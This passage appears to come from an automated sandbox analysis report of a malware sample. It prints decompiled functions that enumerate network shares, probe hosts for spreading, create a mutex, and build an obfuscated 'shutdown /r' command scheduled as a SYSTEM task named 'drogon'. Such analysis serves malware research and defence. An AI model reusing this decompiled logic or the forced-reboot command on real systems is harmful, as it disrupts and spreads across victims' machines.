                                                                                                          
                                                                                                          				_t21 =  *0x4a57bb8;
                                                                                                          				E04A46B95(L"127.0.0.1", 1);
                                                                                                          				E04A46B95(L"localhost", 1, _t21); // executed
                                                                                                          				E04A46B95(L"0.0.0.0", 1, _t21);
                                                                                                          				_t12 =  &_v528;
                                                                                                          				_v8 = 0x104;
                                                                                                          				__imp__GetComputerNameExW(4, _t12,  &_v8);
                                                                                                          				if(_t12 != 0) {
                                                                                                          					E04A46B95( &_v528, 1, _t21);
                                                                                                          				}
                                                                                                          				_t13 = CreateThread(0, 0, E04A48B2E, _t21, 0, 0); // executed
                                                                                                          				if(_t13 != 0) {
                                                                                                          					FindCloseChangeNotification(_t13); // executed
                                                                                                          				}
                                                                                                          				_t24 = 0;
                                                                                                          				L5:
                                                                                                          				E04A4733C(_t21); // executed
                                                                                                          				E04A4742C(_t21); // executed
                                                                                                          				if(_t24 == 0) {
                                                                                                          					E04A4751B(_t21, 0x80000000, 0); // executed
                                                                                                          					_t24 = 1;
                                                                                                          				}
                                                                                                          				Sleep(0x2bf20);
                                                                                                          				goto L5;
                                                                                                          			}









                                                                                                          0x04a477dd
                                                                                                          0x04a477ec
                                                                                                          0x04a477f7
                                                                                                          0x04a47802
                                                                                                          0x04a4780b
                                                                                                          0x04a47814
                                                                                                          0x04a4781b
                                                                                                          0x04a47823
                                                                                                          0x04a4782c
                                                                                                          0x04a4782c
                                                                                                          0x04a4783d
                                                                                                          0x04a47845
                                                                                                          0x04a47848
                                                                                                          0x04a47848
                                                                                                          0x04a4784e
                                                                                                          0x04a47850
                                                                                                          0x04a47851
                                                                                                          0x04a47857
                                                                                                          0x04a4785e
                                                                                                          0x04a47867
                                                                                                          0x04a4786e
                                                                                                          0x04a4786e
                                                                                                          0x04a47874
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetComputerNameExW.KERNEL32(00000004,?,?,?,?,?), ref: 04A4781B
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00008B2E,?,00000000,00000000), ref: 04A4783D
                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04A47848
                                                                                                          • Sleep.KERNEL32(0002BF20,?,?), ref: 04A47874
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseComputerCreateFindNameNotificationSleepThread
                                                                                                          • String ID: 0.0.0.0$127.0.0.1$localhost
                                                                                                          • API String ID: 3743365020-4042105963
                                                                                                          • Opcode ID: b01889e77abe78f6b5bd7714a2a5252dec7a58caa8ea7c3baf85bd52da7987f6
                                                                                                          • Instruction ID: 26215090c7343d165634b6be7b07e15a97adca939d6be85c7dbb7f8b21dbb99e
                                                                                                          • Opcode Fuzzy Hash: b01889e77abe78f6b5bd7714a2a5252dec7a58caa8ea7c3baf85bd52da7987f6
                                                                                                          • Instruction Fuzzy Hash: 7C0196B99401187BF7207B755E88E7F7E7CDBE5A58F100124F901A6001D774BC4685B1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 58%
                                                                                                          			E04A48AB3(void* __ecx, void* _a4) {
                                                                                                          				void _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				void* __esi;
                                                                                                          				intOrPtr _t10;
                                                                                                          				void* _t14;
                                                                                                          				void _t21;
                                                                                                          				void* _t24;
                                                                                                          				intOrPtr* _t28;
                                                                                                          				void* _t30;
                                                                                                          
                                                                                                          				_t30 = _a4;
                                                                                                          				_t21 =  *_t30;
                                                                                                          				_t10 =  *((intOrPtr*)(_t30 + 4));
                                                                                                          				_v8 = _t21;
                                                                                                          				_v12 = _t10;
                                                                                                          				if(_t21 >= _t10) {
                                                                                                          					L6:
                                                                                                          					LocalFree(_t30);
                                                                                                          					return 0;
                                                                                                          				}
                                                                                                          				_t28 = __imp__#14;
                                                                                                          				do {
                                                                                                          					_t14 = E04A4A567( *_t28(_t21)); // executed
                                                                                                          					if(_t14 != 0) {
                                                                                                          						__imp__#12( *_t28(_t21));
                                                                                                          						_t24 = E04A4641A(_t15);
                                                                                                          						if(_t24 != 0) {
                                                                                                          							E04A46B95(_t16, 0,  *((intOrPtr*)(_t30 + 8)));
                                                                                                          							HeapFree(GetProcessHeap(), 0, _t24);
                                                                                                          							_t30 = _a4;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t21 = _v8 + 1;
                                                                                                          					_v8 = _t21;
                                                                                                          				} while (_t21 < _v12);
                                                                                                          				goto L6;
                                                                                                          			}












                                                                                                          0x04a48aba
                                                                                                          0x04a48abd
                                                                                                          0x04a48abf
                                                                                                          0x04a48ac3
                                                                                                          0x04a48ac6
                                                                                                          0x04a48acb
                                                                                                          0x04a48b1e
                                                                                                          0x04a48b1f
                                                                                                          0x04a48b2b
                                                                                                          0x04a48b2b
                                                                                                          0x04a48acd
                                                                                                          0x04a48ad3
                                                                                                          0x04a48ad7
                                                                                                          0x04a48ade
                                                                                                          0x04a48ae4
                                                                                                          0x04a48af0
                                                                                                          0x04a48af4
                                                                                                          0x04a48afb
                                                                                                          0x04a48b09
                                                                                                          0x04a48b0f
                                                                                                          0x04a48b0f
                                                                                                          0x04a48af4
                                                                                                          0x04a48b15
                                                                                                          0x04a48b16
                                                                                                          0x04a48b19
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • htonl.WS2_32(74716490), ref: 04A48AD4
                                                                                                          • htonl.WS2_32(74716490), ref: 04A48AE1
                                                                                                          • inet_ntoa.WS2_32(00000000), ref: 04A48AE4
                                                                                                            • Part of subcall function 04A4641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04A48E53,000000FF,00000000,00000000,00000000,00000000,77454AB0,?,04A48E53,00000000), ref: 04A46439
                                                                                                            • Part of subcall function 04A4641A: GetProcessHeap.KERNEL32(00000000,00000000,?,04A48E53,00000000), ref: 04A46446
                                                                                                            • Part of subcall function 04A4641A: HeapAlloc.KERNEL32(00000000,?,04A48E53,00000000), ref: 04A4644D
                                                                                                            • Part of subcall function 04A4641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04A48E53,000000FF,00000000,00000000,?,04A48E53,00000000), ref: 04A46465
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04A48B02
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A48B09
                                                                                                          • LocalFree.KERNEL32(?,00002000,775F2D10,74716490), ref: 04A48B1F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 3470587009-636472023
                                                                                                          • Opcode ID: f83293bd61782a34bbbeb02037887c8f2055acc1aaa5d520dc96b95692511c6e
                                                                                                          • Instruction ID: 6af3b7a65e7fe33510b4f35fc44b6d1473ccd2b18dd2921b6becee0d8a8bda0d
                                                                                                          • Opcode Fuzzy Hash: f83293bd61782a34bbbeb02037887c8f2055acc1aaa5d520dc96b95692511c6e
                                                                                                          • Instruction Fuzzy Hash: D80121B9A00314BFDB10AFB5DE88C5FBBACEFD93547144829E505E7101D679FD028A64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 04A4A4A5
                                                                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 04A4A4C3
                                                                                                          • htons.WS2_32(?), ref: 04A4A4E3
                                                                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04A4A4F7
                                                                                                          • connect.WS2_32(00000000,?,00000010), ref: 04A4A509
                                                                                                          • select.WS2_32(00000001,00000000,?,00000000,?), ref: 04A4A536
                                                                                                          • __WSAFDIsSet.WS2_32(00000000,?), ref: 04A4A549
                                                                                                          • closesocket.WS2_32(00000000), ref: 04A4A557
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1369790671-0
                                                                                                          • Opcode ID: 77043b033d2ff9bbf4695b46dc3cb6646bb2235115280a953ae482527fe3eaa7
                                                                                                          • Instruction ID: 3a10f7d958296b76d8517f568df47c6367d23e16766e0001116084fc3e044c8d
                                                                                                          • Opcode Fuzzy Hash: 77043b033d2ff9bbf4695b46dc3cb6646bb2235115280a953ae482527fe3eaa7
                                                                                                          • Instruction Fuzzy Hash: 3A319E75900218BFDB11DFA8CD88EEEBBBCFFC8350F00456AE515E2150D3799A458B65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 90%
                                                                                                          			E04A47F04() {
                                                                                                          				long _v8;
                                                                                                          				void _v38;
                                                                                                          				short _v40;
                                                                                                          				void _v74;
                                                                                                          				short _v76;
                                                                                                          				void* _t23;
                                                                                                          				void* _t27;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _t33;
                                                                                                          				signed int _t35;
                                                                                                          				intOrPtr _t39;
                                                                                                          				void* _t44;
                                                                                                          				void* _t46;
                                                                                                          
                                                                                                          				_t35 = 7;
                                                                                                          				_v40 = 0;
                                                                                                          				memset( &_v38, 0, _t35 << 2);
                                                                                                          				asm("stosw");
                                                                                                          				_push(8);
                                                                                                          				_v76 = 0;
                                                                                                          				memset( &_v74, 0, 0 << 2);
                                                                                                          				_t33 = 0;
                                                                                                          				_v8 = 0x10;
                                                                                                          				if(GetComputerNameW( &_v40,  &_v8) == 0) {
                                                                                                          					L8:
                                                                                                          					return _t33;
                                                                                                          				} else {
                                                                                                          					_t46 = 0;
                                                                                                          					_t23 = E04A47D8D(0,  &_v40, _v8);
                                                                                                          					_t39 =  *0x4a53984; // 0x32e55b8
                                                                                                          					_t44 = _t23;
                                                                                                          					if(_t39 != 0) {
                                                                                                          						_t30 =  *0x4a57b94;
                                                                                                          						if( *0x4a57b94 != 0) {
                                                                                                          							_t46 = E04A47D8D(_t39, _t39, _t30 >> 1);
                                                                                                          						}
                                                                                                          					}
                                                                                                          					wsprintfW( &_v76, L"%08X%08X", _t44, _t46);
                                                                                                          					_t27 = CreateMutexW(_t33, _t33,  &_v76); // executed
                                                                                                          					if(_t27 == 0) {
                                                                                                          						GetLastError();
                                                                                                          					} else {
                                                                                                          						if(GetLastError() == 0xb7) {
                                                                                                          							_t33 = 1;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					goto L8;
                                                                                                          				}
                                                                                                          			}















                                                                                                          0x04a47f10
                                                                                                          0x04a47f11
                                                                                                          0x04a47f18
                                                                                                          0x04a47f1a
                                                                                                          0x04a47f1e
                                                                                                          0x04a47f21
                                                                                                          0x04a47f28
                                                                                                          0x04a47f32
                                                                                                          0x04a47f34
                                                                                                          0x04a47f43
                                                                                                          0x04a47fb2
                                                                                                          0x04a47fb6
                                                                                                          0x04a47f45
                                                                                                          0x04a47f4d
                                                                                                          0x04a47f4f
                                                                                                          0x04a47f54
                                                                                                          0x04a47f5a
                                                                                                          0x04a47f5e
                                                                                                          0x04a47f60
                                                                                                          0x04a47f67
                                                                                                          0x04a47f72
                                                                                                          0x04a47f72
                                                                                                          0x04a47f67
                                                                                                          0x04a47f7f
                                                                                                          0x04a47f8e
                                                                                                          0x04a47f97
                                                                                                          0x04a47fab
                                                                                                          0x04a47f99
                                                                                                          0x04a47fa4
                                                                                                          0x04a47fa8
                                                                                                          0x04a47fa8
                                                                                                          0x04a47fa4
                                                                                                          0x00000000
                                                                                                          0x04a47f97

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$ComputerCreateMutexNamewsprintf
                                                                                                          • String ID: %08X%08X
                                                                                                          • API String ID: 4289762557-1563805794
                                                                                                          • Opcode ID: 50d5aff78fe0971e79a1707c5be2f38d844e9cc3f046081b9579c6b16e053d9c
                                                                                                          • Instruction ID: a2ee1b96255d3ef1ef6d13ff4a8df81ab3de3d1ed9975dc9b757de884acda1f3
                                                                                                          • Opcode Fuzzy Hash: 50d5aff78fe0971e79a1707c5be2f38d844e9cc3f046081b9579c6b16e053d9c
                                                                                                          • Instruction Fuzzy Hash: C2115E7AA10248ABEB10DBE8D9849EEBBBDEFC8344F100565E501E2180D775AD06CBB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4A420(void* __ecx, void _a4) {
                                                                                                          				long _v8;
                                                                                                          				void* _t9;
                                                                                                          				void* _t20;
                                                                                                          
                                                                                                          				_v8 = 0;
                                                                                                          				_t20 = HeapAlloc(GetProcessHeap(), 8, 4);
                                                                                                          				if(_t20 != 0) {
                                                                                                          					 *_t20 = _a4; // executed
                                                                                                          					_t9 = CreateThread(0, 0, E04A4A333, _t20, 0, 0); // executed
                                                                                                          					_v8 = _t9;
                                                                                                          					if(_t9 == 0) {
                                                                                                          						HeapFree(GetProcessHeap(), 0, _t20);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _v8;
                                                                                                          			}






                                                                                                          0x04a4a433
                                                                                                          0x04a4a43f
                                                                                                          0x04a4a443
                                                                                                          0x04a4a452
                                                                                                          0x04a4a454
                                                                                                          0x04a4a45a
                                                                                                          0x04a4a45f
                                                                                                          0x04a4a466
                                                                                                          0x04a4a466
                                                                                                          0x04a4a45f
                                                                                                          0x04a4a473

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000004,747143E0,?,00000000,?,?,04A47B89,000000FF), ref: 04A4A436
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,04A47B89,000000FF), ref: 04A4A439
                                                                                                          • CreateThread.KERNELBASE ref: 04A4A454
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,04A47B89,000000FF), ref: 04A4A463
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04A47B89,000000FF), ref: 04A4A466
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocCreateFreeThread
                                                                                                          • String ID: Uqt0Xqt
                                                                                                          • API String ID: 3966119241-3529349503
                                                                                                          • Opcode ID: 119de67aac4fee4af4499d33ea2a2a424106b92e32938980110ae9e574f36fba
                                                                                                          • Instruction ID: e37ad3c1e38e3b8645aabb742b4456552e6a05947ef0cf580ed05a9dd0e18131
                                                                                                          • Opcode Fuzzy Hash: 119de67aac4fee4af4499d33ea2a2a424106b92e32938980110ae9e574f36fba
                                                                                                          • Instruction Fuzzy Hash: 81F05EBA600218BFE710AFA59CCCC9FBFACEBD5394B104829F605D7200D579AD05CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A475D8(intOrPtr _a4, int _a8) {
                                                                                                          				int _v8;
                                                                                                          				int _v12;
                                                                                                          				int _v16;
                                                                                                          				void* _v20;
                                                                                                          				void* _v24;
                                                                                                          				void* __esi;
                                                                                                          				int _t36;
                                                                                                          				int _t42;
                                                                                                          				short* _t47;
                                                                                                          				signed int _t55;
                                                                                                          				signed int _t56;
                                                                                                          				signed int _t58;
                                                                                                          				intOrPtr* _t61;
                                                                                                          				void* _t63;
                                                                                                          				signed int _t66;
                                                                                                          				void* _t67;
                                                                                                          
                                                                                                          				_v12 = _v12 | 0xffffffff;
                                                                                                          				_v16 = 0;
                                                                                                          				_v8 = 0x4000;
                                                                                                          				_t36 = WNetOpenEnumW(1, 0, 0, _a8,  &_v20); // executed
                                                                                                          				if(_t36 == 0) {
                                                                                                          					_t63 = GlobalAlloc(0x40, _v8);
                                                                                                          					_v24 = _t63;
                                                                                                          					if(_t63 != 0) {
                                                                                                          						_v16 = 1;
                                                                                                          						while(1) {
                                                                                                          							memset(_t63, 0, _v8);
                                                                                                          							_t67 = _t67 + 0xc;
                                                                                                          							_t42 = WNetEnumResourceW(_v20,  &_v12, _t63,  &_v8); // executed
                                                                                                          							if(_t42 != 0) {
                                                                                                          								break;
                                                                                                          							}
                                                                                                          							_a8 = 0;
                                                                                                          							if(_v12 > 0) {
                                                                                                          								_t16 = _t63 + 0x14; // 0x14
                                                                                                          								_t61 = _t16;
                                                                                                          								do {
                                                                                                          									_t55 = 2;
                                                                                                          									if(( *(_t61 - 8) & _t55) != _t55) {
                                                                                                          										_t47 =  *_t61;
                                                                                                          										if(_t47 != 0 &&  *_t47 == 0x5c &&  *((short*)(_t47 + 2)) == 0x5c) {
                                                                                                          											_t56 =  *(_t47 + 4) & 0x0000ffff;
                                                                                                          											if(_t56 != 0) {
                                                                                                          												_t66 = _t56;
                                                                                                          												while(_t66 != 0x5c) {
                                                                                                          													_t55 = _t55 + 1;
                                                                                                          													_t58 =  *(_t47 + _t55 * 2) & 0x0000ffff;
                                                                                                          													_t66 = _t58;
                                                                                                          													if(_t58 != 0) {
                                                                                                          														continue;
                                                                                                          													}
                                                                                                          													goto L15;
                                                                                                          												}
                                                                                                          											}
                                                                                                          											L15:
                                                                                                          											 *(_t47 + _t55 * 2) = 0;
                                                                                                          											E04A46B95( *_t61 + 4, 0, _a4);
                                                                                                          											_t63 = _v24;
                                                                                                          										}
                                                                                                          									} else {
                                                                                                          										_t18 = _t61 - 0x14; // 0x0
                                                                                                          										E04A475D8(_a4, _t18);
                                                                                                          									}
                                                                                                          									_a8 = _a8 + 1;
                                                                                                          									_t61 = _t61 + 0x20;
                                                                                                          								} while (_a8 < _v12);
                                                                                                          							}
                                                                                                          						}
                                                                                                          						if(_t42 != 0x103) {
                                                                                                          							_v16 = 0;
                                                                                                          						}
                                                                                                          						GlobalFree(_t63);
                                                                                                          						WNetCloseEnum(_v20);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _v16;
                                                                                                          			}



















                                                                                                          0x04a475de
                                                                                                          0x04a475f3
                                                                                                          0x04a475f6
                                                                                                          0x04a475fd
                                                                                                          0x04a47605
                                                                                                          0x04a47617
                                                                                                          0x04a47619
                                                                                                          0x04a4761e
                                                                                                          0x04a47624
                                                                                                          0x04a47627
                                                                                                          0x04a4762c
                                                                                                          0x04a47631
                                                                                                          0x04a47640
                                                                                                          0x04a47648
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4764e
                                                                                                          0x04a47654
                                                                                                          0x04a47656
                                                                                                          0x04a47656
                                                                                                          0x04a47659
                                                                                                          0x04a4765e
                                                                                                          0x04a47663
                                                                                                          0x04a47673
                                                                                                          0x04a47677
                                                                                                          0x04a47686
                                                                                                          0x04a4768d
                                                                                                          0x04a4768f
                                                                                                          0x04a47691
                                                                                                          0x04a47697
                                                                                                          0x04a47698
                                                                                                          0x04a4769c
                                                                                                          0x04a476a1
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a476a1
                                                                                                          0x04a47691
                                                                                                          0x04a476a3
                                                                                                          0x04a476a8
                                                                                                          0x04a476b3
                                                                                                          0x04a476b8
                                                                                                          0x04a476b8
                                                                                                          0x04a47665
                                                                                                          0x04a47665
                                                                                                          0x04a4766c
                                                                                                          0x04a4766c
                                                                                                          0x04a476bb
                                                                                                          0x04a476c1
                                                                                                          0x04a476c4
                                                                                                          0x04a476c9
                                                                                                          0x04a47654
                                                                                                          0x04a476d3
                                                                                                          0x04a476d5
                                                                                                          0x04a476d5
                                                                                                          0x04a476d9
                                                                                                          0x04a476e2
                                                                                                          0x04a476e2
                                                                                                          0x04a476e8
                                                                                                          0x04a476ef

                                                                                                          APIs
                                                                                                          • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 04A475FD
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 04A47611
                                                                                                          • memset.MSVCRT ref: 04A4762C
                                                                                                          • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 04A47640
                                                                                                          • GlobalFree.KERNEL32 ref: 04A476D9
                                                                                                          • WNetCloseEnum.MPR(0000FFFF), ref: 04A476E2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4070278229-0
                                                                                                          • Opcode ID: be1ae51753eed9ac7446ded3ca01a360d91761fda8f1e8890072973ba1f23223
                                                                                                          • Instruction ID: 78e1778c38e1343aa055341207cf7fe433ea248143f1033b00c6a86588ea0378
                                                                                                          • Opcode Fuzzy Hash: be1ae51753eed9ac7446ded3ca01a360d91761fda8f1e8890072973ba1f23223
                                                                                                          • Instruction Fuzzy Hash: A831C17A900159EFDB60EF99CC84DAEFBBAFFC4304B108029E904A7150D735AE45DB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A48192() {
                                                                                                          				short _v6;
                                                                                                          				short _v8;
                                                                                                          				short _v10;
                                                                                                          				short _v12;
                                                                                                          				short _v14;
                                                                                                          				short _v16;
                                                                                                          				short _v18;
                                                                                                          				short _v20;
                                                                                                          				short _v22;
                                                                                                          				short _v24;
                                                                                                          				short _v26;
                                                                                                          				short _v28;
                                                                                                          				short _v30;
                                                                                                          				short _v32;
                                                                                                          				short _v34;
                                                                                                          				short _v36;
                                                                                                          				short _v38;
                                                                                                          				short _v40;
                                                                                                          				short _v42;
                                                                                                          				short _v44;
                                                                                                          				short _v46;
                                                                                                          				short _v48;
                                                                                                          				short _v50;
                                                                                                          				short _v52;
                                                                                                          				struct _SYSTEMTIME _v68;
                                                                                                          				short _v1628;
                                                                                                          				short _v3676;
                                                                                                          				void* _t48;
                                                                                                          				signed int _t49;
                                                                                                          				short _t56;
                                                                                                          				short _t57;
                                                                                                          				short _t58;
                                                                                                          				short _t59;
                                                                                                          				short _t60;
                                                                                                          				short _t61;
                                                                                                          				short _t62;
                                                                                                          				short _t63;
                                                                                                          				short _t64;
                                                                                                          				short _t65;
                                                                                                          				short _t66;
                                                                                                          				short _t67;
                                                                                                          				short _t68;
                                                                                                          				short _t69;
                                                                                                          				short _t70;
                                                                                                          				short _t79;
                                                                                                          				short _t80;
                                                                                                          				signed int _t82;
                                                                                                          				signed int _t84;
                                                                                                          				short _t86;
                                                                                                          				short _t87;
                                                                                                          				short _t89;
                                                                                                          				short _t90;
                                                                                                          				short _t92;
                                                                                                          				signed int _t98;
                                                                                                          				signed int _t101;
                                                                                                          
                                                                                                          				_t80 = 0;
                                                                                                          				if(( *0x4a57bc0 & 0x00000002) != 0) {
                                                                                                          					GetLocalTime( &_v68);
                                                                                                          					_t48 = E04A46477();
                                                                                                          					if(_t48 < 0xf) {
                                                                                                          						_t48 = 0xf;
                                                                                                          					}
                                                                                                          					_t49 = (_v68.wMinute & 0x0000ffff) + _t48 + 3;
                                                                                                          					_t82 = 0x3c;
                                                                                                          					_t101 = _t49 % _t82;
                                                                                                          					_t84 = 0x18;
                                                                                                          					_t98 = ((_v68.wHour & 0x0000ffff) + _t49 / _t82) % _t84;
                                                                                                          					if(GetSystemDirectoryW( &_v1628, 0x30c) != 0) {
                                                                                                          						_t56 = 0x73;
                                                                                                          						_v52 = _t56;
                                                                                                          						_t57 = 0x68;
                                                                                                          						_v50 = _t57;
                                                                                                          						_t58 = 0x75;
                                                                                                          						_v48 = _t58;
                                                                                                          						_t59 = 0x74;
                                                                                                          						_v46 = _t59;
                                                                                                          						_t60 = 0x64;
                                                                                                          						_v44 = _t60;
                                                                                                          						_t61 = 0x6f;
                                                                                                          						_v42 = _t61;
                                                                                                          						_t62 = 0x77;
                                                                                                          						_v40 = _t62;
                                                                                                          						_t63 = 0x6e;
                                                                                                          						_v38 = _t63;
                                                                                                          						_t64 = 0x2e;
                                                                                                          						_v36 = _t64;
                                                                                                          						_t65 = 0x65;
                                                                                                          						_v34 = _t65;
                                                                                                          						_t66 = 0x78;
                                                                                                          						_v32 = _t66;
                                                                                                          						_t67 = 0x65;
                                                                                                          						_v30 = _t67;
                                                                                                          						_t68 = 0x20;
                                                                                                          						_v28 = _t68;
                                                                                                          						_t86 = 0x2f;
                                                                                                          						_v26 = _t86;
                                                                                                          						_t87 = 0x72;
                                                                                                          						_v24 = _t87;
                                                                                                          						_v22 = _t68;
                                                                                                          						_t89 = 0x2f;
                                                                                                          						_v20 = _t89;
                                                                                                          						_t90 = 0x74;
                                                                                                          						_v18 = _t90;
                                                                                                          						_v16 = _t68;
                                                                                                          						_t92 = 0x30;
                                                                                                          						_v12 = _t68;
                                                                                                          						_t69 = 0x2f;
                                                                                                          						_v10 = _t69;
                                                                                                          						_t70 = 0x66;
                                                                                                          						_v8 = _t70;
                                                                                                          						_v6 = 0;
                                                                                                          						_v14 = _t92;
                                                                                                          						if(PathAppendW( &_v1628,  &_v52) != 0) {
                                                                                                          							wsprintfW( &_v3676, L"schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00",  &_v1628, _t98, _t101);
                                                                                                          							_t79 = E04A47FB7( &_v3676, 0); // executed
                                                                                                          							_t80 = _t79;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t80;
                                                                                                          			}


























































                                                                                                          0x04a4819c
                                                                                                          0x04a481a5
                                                                                                          0x04a481af
